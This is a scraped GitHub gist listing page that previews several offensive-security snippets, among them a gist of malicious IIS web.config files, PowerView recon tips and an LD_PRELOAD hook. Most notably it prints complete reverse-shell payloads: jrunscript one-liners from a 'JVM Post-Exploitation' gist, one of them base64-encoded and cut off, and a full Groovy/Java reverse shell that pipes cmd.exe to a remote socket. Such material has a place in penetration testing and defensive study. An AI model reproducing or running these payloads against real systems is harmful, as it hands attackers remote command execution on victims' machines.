Skip to content

Instantly share code, notes, and snippets.

Decidedly Gray decidedlygray

Block or report user

Report or block decidedlygray

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@0x4D31
0x4D31 / libssh_server_fingerprints.md
Last active Sep 6, 2019
[libssh server fingerprints] An analysis of Censys Public Scan 20180807 (only port 22) to estimate the number of servers {potentially} vulnerable to the recent Libssh bug #libssh #hassh
View libssh_server_fingerprints.md
@gazcbm
gazcbm / downloader web.config
Created Jul 11, 2018
Malicious web.config's
View downloader web.config
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<handlers accessPolicy="Read, Script, Write">
<add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
</handlers>
<security>
<requestFiltering>
<fileExtensions>
<remove fileExtension=".config" />
@dirtyak
dirtyak / shodan_cli.py
Last active Sep 11, 2019
Simple shodan command line in python
View shodan_cli.py
#!/bin/env/python
import shodan
import os
import sys
import subprocess
from termcolor import cprint
from pyfiglet import figlet_format
######################################################
SHODAN_API_KEY = "ENTER_YOUR_API_KEY_HERE"
@apsun
apsun / hax.c
Last active Aug 29, 2019
Hook main() using LD_PRELOAD
View hax.c
/*
* Hook main() using LD_PRELOAD, because why not?
* Obviously, this code is not portable. Use at your own risk.
*
* Compile using 'gcc hax.c -o hax.so -fPIC -shared -ldl'
* Then run your program as 'LD_PRELOAD=$PWD/hax.so ./a.out'
*/
#define _GNU_SOURCE
#include <stdio.h>
@mgeeky
mgeeky / openvas-automate.sh
Last active Sep 29, 2019
OpenVAS automation script.
View openvas-automate.sh
#!/bin/bash
#
# OpenVAS automation script.
# Mariusz B. / mgeeky, '17
# v0.2
#
trap ctrl_c INT
# --- CONFIGURATION ---
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active Oct 18, 2019
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@frohoff
frohoff / JVM_POST_EXPLOIT.md
Last active Oct 14, 2019
JVM Post-Exploitation One-Liners
View JVM_POST_EXPLOIT.md

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
@clckwrkbdgr
clckwrkbdgr / pastebin.py
Created Mar 6, 2016
Using Pastebin as a free online data storage
View pastebin.py
import requests
import xml.etree.ElementTree as ET
import sys
class Pastebin:
def __init__(self, api_key, user_key):
self.api_key, self.user_key = api_key, user_key
self.session = requests.session()
def _post(self, option, data = None):
data = data.copy() if data else {}
@frohoff
frohoff / revsh.groovy
Created Mar 2, 2016
Pure Groovy/Java Reverse Shell
View revsh.groovy
String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
@serializingme
serializingme / Reversing Aruba Instant.md
Created Jan 23, 2016
Reversing Aruba Instant Firmware
View Reversing Aruba Instant.md

Aruba produces two different software loads for their Access Point hardware. The first is called ArubaOS and the second is called Aruba Instant. With ArubaOS, the AP requires a Mobility Controller (hardware) to be installed in the network. With the Aruba Instant it is possible to run AP’s independently (standalone mode) or in a cluster, with no Mobility Controller in the network.

You can’t perform that action at this time.